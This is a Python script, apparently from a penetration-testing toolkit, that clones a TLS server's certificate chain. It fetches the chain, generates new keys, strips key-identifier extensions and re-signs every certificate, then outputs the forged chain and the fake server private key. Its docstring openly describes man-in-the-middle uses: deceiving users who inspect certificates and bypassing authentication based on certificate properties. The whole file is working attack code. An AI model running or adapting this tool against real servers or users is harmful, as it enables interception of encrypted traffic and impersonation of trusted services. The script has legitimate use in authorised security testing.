#!/usr/bin/env python3
#-*- mode: Python;-*-
#
# Requires Python 3+

'''
An experimental script which attempts to clone a server certificate's
entire certificate chain, ideally altering only the keys and signatures
along the way.  This is useful in a few man-in-the-middle attack
situations, including:

 - You swap out certificates on a user and they manually inspect the
   certificate properties before accepting them.  Identical properties
   are more convincing.

 - A product includes special-purpose certificate properties that are
   validated with custom procedures (e.g. client user name, product
   serial number, ...).  If these properties are validated but the
   certificate's CA isn't, then cloning the full set of certificate
   properties is essential to bypass the authentication.

Currently, this script is somewhat limited and buggy, but will hopefully
improve over time.  Patches welcome!


Copyright (C) 2014 Blindspot Security LLC
Author: Timothy D. Morgan

 This program is free software: you can redistribute it and/or modify
 it under the terms of the GNU Lesser General Public License, version 3,
 as published by the Free Software Foundation.

 This program is distributed in the hope that it will be useful,
 but WITHOUT ANY WARRANTY; without even the implied warranty of
 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 GNU General Public License for more details.

 You should have received a copy of the GNU General Public License
 along with this program.  If not, see http://www.gnu.org/licenses/.
'''

import sys
import argparse
import traceback
import socket

try:
    import OpenSSL
    from OpenSSL import SSL
except ImportError:
    # Only a missing module should trigger the installation hint; any other
    # failure is allowed to surface with its own traceback.
    sys.stderr.write('ERROR: Could not locate pyOpenSSL module. Under Debian-based systems, try:\n')
    sys.stderr.write('       # apt-get install python3-openssl\n')
    sys.stderr.write('NOTE: pyOpenSSL version 0.14 or later is required!\n')
    sys.exit(2)


# Digest names recognised inside a certificate's signature algorithm name.
_KNOWN_DIGESTS = ('sha512', 'sha384', 'sha256', 'sha224', 'sha1', 'md5')


def createClientContext():
    '''
    Build the pyOpenSSL client context used to talk to the target server.

    Peer verification is disabled because the goal is only to retrieve the
    certificate chain, whatever its trust status.
    '''
    # SSLv23_METHOD negotiates the best protocol version both sides support.
    # The previous hard-coded SSLv3_METHOD is refused by most current servers
    # and OpenSSL builds.
    tlsClientContext = SSL.Context(SSL.SSLv23_METHOD)
    tlsClientContext.set_verify(SSL.VERIFY_NONE, (lambda a,b,c,d,e: True))
    return tlsClientContext


def fetchCertificateChain(host, port):
    '''
    Connect to host:port, perform a TLS handshake and return the peer's
    certificate chain as provided by pyOpenSSL's get_peer_cert_chain().

    Returns None if the handshake fails (the traceback is printed).  Errors
    raised while establishing the TCP connection propagate to the caller.
    '''
    # create_connection resolves host names and handles IPv4 and IPv6 alike.
    serverSock = socket.create_connection((host, port))
    try:
        try:
            server = SSL.Connection(createClientContext(), serverSock)
            server.set_connect_state()
            server.do_handshake()
        except Exception:
            print("Exception during handshake with server: ")
            # print_exc() reports the exception currently being handled; its
            # first positional parameter is a frame limit, not the exception.
            traceback.print_exc()
            return None

        return server.get_peer_cert_chain()
    finally:
        # Always release the socket, whether or not the handshake succeeded.
        serverSock.close()


def normalizeCertificateName(cert_name):
    '''
    Return the components of an X509 name as a sorted tuple, so that names
    can be compared and used as dictionary keys.
    '''
    return tuple(sorted(cert_name.get_components()))


def normalizeCertificateChain(chain):
    '''
    Reorder a certificate chain so that each certificate is followed by its
    issuer, ending with the root (or highest-level intermediary) found.

    Returns a new list; an empty list is returned when no root candidate
    can be identified.
    '''
    # Organize certificates by subject and issuer for quick lookups
    subject_table = {}
    issuer_table = {}
    for c in chain:
        s = normalizeCertificateName(c.get_subject())
        i = normalizeCertificateName(c.get_issuer())
        subject_table[s] = c
        # A self-signed certificate must not be registered as its own child,
        # otherwise the walk below would never leave it.
        if i != s:
            issuer_table[i] = c

    # Now find root or highest-level intermediary
    root = None
    for c in chain:
        i = normalizeCertificateName(c.get_issuer())
        s = normalizeCertificateName(c.get_subject())
        if (i == s) or (i not in subject_table):
            if root is not None:
                sys.stderr.write("WARN: Multiple root certificates found or broken certificate chain detected.\n")
            else:
                # Go with the first identified "root", since that's more likely to link up with the server cert
                root = c

    # Finally, build the chain from the top-down in the correct order
    new_chain = []
    visited = set()
    nxt = root
    while nxt is not None:
        s = normalizeCertificateName(nxt.get_subject())
        if s in visited:
            # Names that issue each other in a cycle: stop instead of looping forever.
            break
        visited.add(s)
        new_chain.insert(0, nxt)
        nxt = issuer_table.get(s)

    return new_chain


def genFakeKey(certificate):
    '''
    Generate a fresh key pair with the same type and bit length as the
    public key of the given certificate.
    '''
    fake_key = OpenSSL.crypto.PKey()
    old_pubkey = certificate.get_pubkey()
    fake_key.generate_key(old_pubkey.type(), old_pubkey.bits())

    return fake_key


def getDigestAlgorithm(certificate):
    '''
    Return the name of the digest used in the certificate's signature
    algorithm ('md5', 'sha1', 'sha224', 'sha256', 'sha384' or 'sha512').

    Falls back to 'sha1' when no known digest name is recognised.
    '''
    # XXX: ugly hack because pyopenssl API for this is limited
    algorithm = certificate.get_signature_algorithm().lower()
    for digest in _KNOWN_DIGESTS:
        if digest.encode('ascii') in algorithm:
            return digest

    return 'sha1'


def deleteExtension(certificate, index):
    '''
    Remove the extension at position `index` from the certificate by calling
    OpenSSL's X509_delete_ext() directly through cffi.

    NOTE: relies on the private `_x509` attribute of the pyOpenSSL
    certificate object and on a 'libssl.so' that can be dlopen()ed.
    '''
    from cffi import FFI
    ffi = FFI()
    ffi.cdef('''void* X509_delete_ext(void* x, int loc);''')
    libssl = ffi.dlopen('libssl.so')
    ext = libssl.X509_delete_ext(certificate._x509, index)
    #XXX: supposed to free ext here


def removePeskyExtensions(certificate):
    '''
    Strip the subjectKeyIdentifier and authorityKeyIdentifier extensions
    from the certificate, in place.
    '''
    #for index in range(0,certificate.get_extension_count()):
    #    e = certificate.get_extension(index)
    #    print("extension %d: %s\n" % (index, e.get_short_name()), e)

    index = 0
    while index < certificate.get_extension_count():
        e = certificate.get_extension(index)
        if e.get_short_name() in (b'subjectKeyIdentifier', b'authorityKeyIdentifier'):
            deleteExtension(certificate, index)
            #XXX: would be nice if each of these extensions were re-added with appropriate values
            # The following extension has shifted into this slot, so the
            # same index must be examined again.
            continue
        index += 1

    #for index in range(0,certificate.get_extension_count()):
    #    e = certificate.get_extension(index)
    #    print("extension %d: %s\n" % (index, e.get_short_name()), e)


def genFakeCertificateChain(cert_chain):
    '''
    Forge a certificate chain: every certificate gets a freshly generated
    key and is re-signed by the new key of the certificate above it.

    cert_chain is expected in the order the server sent it (server
    certificate first, highest authority last).  The certificate objects are
    modified in place; the list itself is left untouched.

    Returns a tuple (key, chain) where key is the new private key of the
    first certificate of the chain and chain is the forged chain in the same
    order as the input.

    Raises ValueError if cert_chain is empty or None.
    '''
    if not cert_chain:
        raise ValueError('Cannot forge an empty certificate chain.')

    # Work on a reversed copy so the caller's list keeps its order.
    ordered = list(reversed(cert_chain))

    # start with highest level authority
    top = ordered[0]
    i = normalizeCertificateName(top.get_issuer())
    s = normalizeCertificateName(top.get_subject())
    if s != i:
        # XXX: consider retrieving root locally and including a forged version instead
        top.set_issuer(top.get_subject())
    signing_key = genFakeKey(top)
    top.set_pubkey(signing_key)
    removePeskyExtensions(top)
    # The top certificate is self-signed with its own new key.
    top.sign(signing_key, getDigestAlgorithm(top))
    forged = [top]

    for cert in ordered[1:]:
        key = genFakeKey(cert)
        cert.set_pubkey(key)
        removePeskyExtensions(cert)
        cert.sign(signing_key, getDigestAlgorithm(cert))
        signing_key = key
        forged.append(cert)

    forged.reverse()
    # signing_key now holds the key generated last, i.e. the one belonging
    # to the first certificate of the returned chain.
    return signing_key, forged


parser = argparse.ArgumentParser(
    description="An experimental script which attempts to clone an SSL server's"
    " entire certificate chain, ideally altering only the keys and signatures"
    " along the way. The script prints results to stdout, starting with a PKCS7 (PEM)"
    " key (the fake server private key) followed by the newly forged certificate"
    " chain, also in PEM format. (The new intermediate and root private keys are"
    " not currently printed, but will likely be somehow available in a future"
    " version.)")

parser.add_argument('host', nargs=1, default=None,
                    help='IP address or host name of server')
parser.add_argument('port', nargs='?', type=int, default=443,
                    help='TCP port number of SSL service (default: 443)')
parser.add_argument(
    '--p12', dest='p12_filename', type=str, required=False, default=None,
    help='If specified, a PKCS12 file will be written with the generated certificates'
    ' and server key (in addition to normal PKCS7 output). NOTE: the file specified'
    ' will be overwritten without prompting if it already exists.')
parser.add_argument(
    '--p12password', dest='p12_password', type=str, required=False, default='bletchley',
    help='If specified along with the --p12 argument, the PKCS12 file will use this password'
    ' to encrypt the server private key. (Otherwise, the password "bletchley" is used).')
options = parser.parse_args()

#print("REAL CHAIN:")
chain = fetchCertificateChain(options.host[0],options.port)
if not chain:
    # The handshake failed (already reported) or the server sent no chain.
    sys.stderr.write('ERROR: Could not retrieve a certificate chain from the server.\n')
    sys.exit(1)
#for c in chain:
#    print(OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, c).decode('utf-8'))

#chain = normalizeCertificateChain(chain)
#for c in chain:
#    print(OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, c).decode('utf-8'))

#print("FAKE KEY AND CHAIN:")
fake_key, fake_chain = genFakeCertificateChain(chain)
print(OpenSSL.crypto.dump_privatekey(OpenSSL.crypto.FILETYPE_PEM, fake_key).decode('utf-8'))
for c in fake_chain:
    print(OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, c).decode('utf-8'))

if options.p12_filename:
    p12 = OpenSSL.crypto.PKCS12()
    p12.set_ca_certificates(fake_chain[1:])
    p12.set_privatekey(fake_key)
    p12.set_certificate(fake_chain[0])
    # The context manager closes the file even if the export fails.
    with open(options.p12_filename, 'wb') as p12_file:
        p12_file.write(p12.export(passphrase=options.p12_password.encode('utf-8')))